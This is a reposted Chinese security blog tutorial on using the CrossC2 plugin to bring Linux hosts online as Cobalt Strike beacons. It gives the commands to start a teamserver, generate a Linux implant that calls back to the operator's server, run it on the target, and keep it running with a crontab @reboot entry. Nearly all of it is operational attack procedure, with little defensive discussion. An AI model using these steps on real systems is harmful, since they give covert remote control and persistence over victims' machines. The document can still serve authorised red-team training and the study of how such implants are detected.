CobaltStrike上线Linux

admin 2022年4月24日13:14:12评论78 views字数 889阅读2分57秒阅读模式

在红蓝对抗中,我们常需要对目标进行长时间的控制,cobaltstrike原生对于上线windows比较轻松友好,但如果是Linux平台就需要用到第三方插件了。


准备工作


这里使用CrossC2的插件,类似于在linux上反弹一个cobaltstrike类的shell。


github:https://github.com/gloxec/CrossC2


下载时注意自己的cs版本(我这里使用的是3.0.2的最新版插件,cs版本为4.3)


需要下载以下两个文件:


CrossC2***.cna、genCrossC2.Linux


由于我的木马是在linux平台生成的,因此使用genCrossC2.Linux,可根据自己平台的差异自行选择


服务端部署


cobaltstrike服务端部署

chmod +x teamserver./teamserver [ip] 
		
输入密码查看隐藏内容

CobaltStrike上线Linux


客户端连接


CobaltStrike上线Linux


建立一个监听器,需要注意的是crossc2插件只支持https的beacon


CobaltStrike上线Linux


安装crossc2


CobaltStrike上线Linux


生成木马


我这里是在服务端的cobaltstrike目录直接生成的,如果在非服务端生成需要将服务端根目录的隐藏文件.cobaltstrike.beacon_keys复制下来放到cs根目录

chmod +x genCrossC2.Linux./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test

CobaltStrike上线Linux


上线


在目标靶机上直接运行就可以看到上线了.

chmod +x test./test

CobaltStrike上线Linux


权限维持


一个简单的思想就是将其添加的系统启动项

有很多种方法,这里讲个最简单的,通过计划任务的方式实现

crontab -e@reboot /tmp/test

这样每次重启之后都能重新执行

这里需要注意的是要设置以下次登录的用户的crontab

————————————————

作者:xzajyjs

原文链接:https://blog.csdn.net/qq_35664104


推荐阅读

CobaltStrike上线Linux

如果有用,师傅们点个在看、赞

原文始发于微信公众号(乌雲安全):CobaltStrike上线Linux

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月24日13:14:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CobaltStrike上线Linuxhttp://cn-sec.com/archives/937909.html

发表评论

匿名网友 填写信息